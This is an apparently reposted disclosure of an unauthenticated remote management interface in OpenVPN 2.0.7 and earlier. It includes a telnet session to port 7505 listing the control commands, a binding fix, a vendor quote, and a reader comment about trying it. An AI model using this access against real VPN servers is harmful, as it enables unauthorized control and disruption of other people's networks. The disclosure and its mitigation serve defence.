Code: There is a flaw (well more a stupid design than anything else) in OpenVPN 2.0.7 (and below) in the the Remote Management Interface that allows an attacker to gain complete control because there is NO AUTHENTICATION (YES NO AUTHENTICATION AT ALL!). This can be carried out from within the LAN that the OpenVPN server is running on, over the VPN itself or via the internet. This happens because the management interface can be binded to an internet accessible IP address. Not good! Simply telnet to the OpenVPN server running the remote management interface on port 7505. root@trinity# telnet ********* 7505 Trying *********... Connected to *********. Escape character is '^]'. >INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info help Management Interface for OpenVPN 2.0_rc14 i686-suse-linux [SSL] [LZO] [EPOLL] built on Feb 3 2005 Commands: echo [on|off] [N|all] : Like log, but only show messages in echo buffer. exit|quit : Close management session. help : Print this message. hold [on|off|release] : Set/show hold flag to on/off state, or release current hold and start tunnel. kill cn : Kill the client instance(s) having common name cn. kill IP:port : Kill the client instance connecting from IP:port. log [on|off] [N|all] : Turn on/off realtime log display + show last N lines or 'all' for entire history. mute [n] : Set log mute level to n, or show level if n is absent. net : (Windows only) Show network info and routing table. password type p : Enter password p for a queried OpenVPN password. signal s : Send signal s to daemon, s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2. state [on|off] [N|all] : Like log, but show state history. status [n] : Show current daemon status info using format #n. test n : Produce n lines of output for testing/debugging. username type u : Enter username u for a queried OpenVPN username. verb [n] : Set log verbosity level to n, or show if n is absent. version : Show current version number. END exit Connection closed by foreign host. root@trinity# The fix? Make sure you bind the remote management interface to 127.0.0.1 or a local network address (however, the later will not stop you getting pwned internally, obviously). A quote from the OpenVPN guys themselves: "The management protocol is currently cleartext without an explicit security layer. For this reason, it is recommended that the management interface either listen on localhost (127.0.0.1) or on the local VPN address. It's possible to remotely connect to the management interface over the VPN itself, though some capabilities will be limited in this mode, such as the ability to provide private key passwords." "Future versions of the management interface may allow out-of-band connections (i.e. not over the VPN) and secured with SSL/TLS." OMG *&$%*%# software vendors, please don't release stuff without authentication! c0redump #hacktech @ undernet securityfocus.com
[rus]Интересно. Как-нибудь надо попробовать...[/rus] [eng]Pretty interesting. Will have to try it...[/eng]
